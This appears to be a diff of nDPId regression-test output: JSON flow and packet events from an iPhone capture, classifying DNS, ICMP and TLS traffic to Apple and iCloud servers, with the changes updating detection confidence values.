+00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":182,"source":"iphone.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598760,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1582454598760,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53272,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"play.itunes.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.123.77.26"}} 
00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"iphone.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1582454598760,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1582454598760,"pkt":"xGGLNYKpxiwDYGpkCABFAADGO68AAEARuRXAqAIBwKgCEQA19D4AssJtjeyBgAABAAQAAAAAA2NsNAVhcHBsZQNjb20AAAEAAcAMAAUAAQAAD1IAJQdjbDQtY2RuDG9yaWdpbi1hcHBsZQNjb20GYWthZG5zA25ldADAKwAFAAEAAABkABgDY2w1BWFwcGxlA2NvbQdlZGdla2V5wEvAXAAFAAEAABGWABoGZTE0ODY4BWRzY2U5CmFrYW1haWVkZ2XAS8CAAAEAAQAAAA8ABGhJPR4="} -00776{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":183,"source":"iphone.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598760,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1582454598760,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62526,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"cl4.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"104.73.61.30"}} 
+00776{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":183,"source":"iphone.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598760,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1582454598760,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62526,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"cl4.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"104.73.61.30"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":184,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598766,"flow_last_seen":1582454598766,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598766,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1582454598766,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598766,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGHzLAqAIRXHr8UsWWAbuHn+lSAAAAALDC\/\/\/nwQAAAgQFtAEDAwcBAQgKEd\/ozwAAAAAEAgAA"} 
-01344{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":185,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454598587,"flow_last_seen":1582454598768,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4837,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1582454598768,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","server_names":"gateway-india.icloud.com,gateway-carry.icloud.com,gateway.icloud.com,gateway-australia.icloud.com,gateway-sandbox.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D2:DA:1C:68:0C:91:A7:DB:BA:B2:2D:29:06:DB:57:42:10:3D:3A:FE"}} +01344{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":185,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454598587,"flow_last_seen":1582454598768,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4837,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1582454598768,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","server_names":"gateway-india.icloud.com,gateway-carry.icloud.com,gateway.icloud.com,gateway-australia.icloud.com,gateway-sandbox.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D2:DA:1C:68:0C:91:A7:DB:BA:B2:2D:29:06:DB:57:42:10:3D:3A:FE"}} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1582454598801,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598801,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGajZcevxSwKgCEQG7xZaFiMYch5\/pU6BScSAUDwAAAgQFrAQCCAr\/dyjxEd\/ozwEDAwc="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1582454598867,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598867,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADEG+7MR+LlXwKgCEQG7xZWfE+IlqBre6aBScSBsSgAAAgQFrAEBCArpLCwFEd\/opwEDAwU="} 
00547{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":193,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598885,"flow_last_seen":1582454598885,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1582454598885,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1582454598885,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1582454598885,"pkt":"xiwDYGpkxGGLNYKpCABFAAA4434AAEABEeTAqAIRwKgCAQMDBHsAAAAARQAAz8hDAABAESx4wKgCAcCoAhEANfeRALsAAA=="} -00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":193,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598885,"flow_last_seen":1582454598885,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1582454598885,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.664498} 
+00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":193,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598885,"flow_last_seen":1582454598885,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1582454598885,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.664498} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1582454598886,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1582454598886,"pkt":"xiwDYGpkxGGLNYKpCABFAAA4zMkAAEABKJnAqAIRwKgCAQMDKS0AAAAARQAAz3UJAABAEX+ywKgCAcCoAhEANdLfALsAAA=="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1582454598886,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1582454598886,"pkt":"xiwDYGpkxGGLNYKpCABFAAA4CTAAAEAB7DLAqAIRwKgCAQMDOTMAAAAARQAA0GrYAABAEYniwKgCAcCoAhEANcLYALwAAA=="} 
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":200,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598888,"flow_last_seen":1582454598888,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598888,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1582454598888,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598888,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAG0pfAqAIRaEk9HsWXAbvBeeAaAAAAALDC\/\/9qCgAAAgQFtAEDAwcBAQgKEd\/pSQAAAAAEAgAA"} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1582454598888,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598888,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGHz7AqAIRXHr8UsWWAbuHn+lThYjGHYAQBAuvrgAAAQEIChHf6Un\/dyjx"} 
-00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":202,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598766,"flow_last_seen":1582454598889,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598889,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"iphone-ld.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":202,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598766,"flow_last_seen":1582454598889,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598889,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"iphone-ld.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1582454598892,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598892,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGrLvAqAIREfi5V8WVAbuoGt7pnxPiJoAQBAsEtQAAAQEIChHf6VPpLCwF"} -00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":206,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598721,"flow_last_seen":1582454598893,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598893,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-keyvalueservice.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":212,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598766,"flow_last_seen":1582454598926,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598926,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"iphone-ld.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":206,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598721,"flow_last_seen":1582454598893,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598893,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-keyvalueservice.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":212,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598766,"flow_last_seen":1582454598926,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598926,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"iphone-ld.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1582454598926,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598926,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGHZxoST0ewKgCEQG7xZdpIXVbwXngG6BScSBpXgAAAgQFrAQCCAqgrSHdEd\/pSQEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1582454598934,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598934,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAG0qPAqAIRaEk9HsWXAbvBeeAbaSF1XIAQBAsFUQAAAQEIChHf6XCgrSHd"} -00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598888,"flow_last_seen":1582454598934,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598934,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"cl4.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":225,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598888,"flow_last_seen":1582454598974,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598974,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cl4.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00983{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":233,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598721,"flow_last_seen":1582454599041,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454599041,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"p26-keyvalueservice.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -03624{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":237,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1582454598721,"flow_last_seen":1582454599054,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6277,"flow_avg_l4_payload_len":697,"midstream":0,"thread_ts_msec":1582454599054,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p26-keyvalueservice.icloud.com","server_names":"p62-keyvalueservice.icloud.com,p41-keyvalueservice.icloud.com,p97-keyvalueservice.icloud.com,p28-keyvalueservice.icloud.com,p32-keyvalueservice.icloud.com,p56-keyvalueservice.icloud.com,p33-keyvalueservice.icloud.com,p37-keyvalueservice.icloud.com,p67-keyvalueservice.icloud.com,p70-keyvalueservice.icloud.com,p63-keyvalueservice.icloud.com,p07-keyvalueservice.icloud.com,p52-keyvalueservice.icloud.com,p18-keyvalueservice.icloud.com,p21-keyvalueservice.icloud.com,p17-keyvalueservice.icloud.com,p36-keyvalueservice.icloud.com,p19-keyvalueservice.icloud.com,p26-keyvalueservice.icloud.com,p55-keyvalueservice.icloud.com,p06-keyvalueservice.icloud.com,p23-keyvalueservice.icloud.com,p65-keyvalueservice.icloud.com,p58-keyvalueservice.icloud.com,p35-keyvalueservice.icloud.com,p42-keyvalueservice.icloud.com,p12-keyvalueservice.icloud.com,p15-keyvalueservice.icloud.com,p16-keyvalueservice.icloud.com,p29-keyvalu
eservice.icloud.com,p39-keyvalueservice.icloud.com,p71-keyvalueservice.icloud.com,p22-keyvalueservice.icloud.com,p40-keyvalueservice.icloud.com,p11-keyvalueservice.icloud.com,p66-keyvalueservice.icloud.com,p68-keyvalueservice.icloud.com,p201-keyvalueservice.icloud.com,p10-keyvalueservice.icloud.com,p61-keyvalueservice.icloud.com,p30-keyvalueservice.icloud.com,p01-keyvalueservice.icloud.com,p14-keyvalueservice.icloud.com,p50-keyvalueservice.icloud.com,p31-keyvalueservice.icloud.com,p47-keyvalueservice.icloud.com,p48-keyvalueservice.icloud.com,p20-keyvalueservice.icloud.com,p51-keyvalueservice.icloud.com,p27-keyvalueservice.icloud.com,p49-keyvalueservice.icloud.com,p03-keyvalueservice.icloud.com,p24-keyvalueservice.icloud.com,p25-keyvalueservice.icloud.com,p08-keyvalueservice.icloud.com,p13-keyvalueservice.icloud.com,p04-keyvalueservice.icloud.com,p05-keyvalueservice.icloud.com,p02-keyvalueservice.icloud.com,p09-keyvalueservice.icloud.com,p57-keyvalueservice.icloud.com,p59-keyvalueservice.icloud.com,p64-keyvalueservice.icloud.com,p38-keyvalueservice.icloud.com,p54-keyvalueservice.icloud.com,p72-keyvalueservice.icloud.com,keyvalueservice.icloud.com,p69-keyvalueservice.icloud.com,p43-keyvalueservice.icloud.com,p45-keyvalueservice.icloud.com,p202-keyvalueservice.icloud.com,p98-keyvalueservice.icloud.com,p34-keyvalueservice.icloud.com,p44-keyvalueservice.icloud.com,p46-keyvalueservice.icloud.com,p53-keyvalueservice.icloud.com,p60-keyvalueservice.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=keyvalueservice.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D8:84:3B:15:06:49:1C:72:C4:05:C0:F0:82:3B:43:4A:D1:8F:D5:9F"}} 
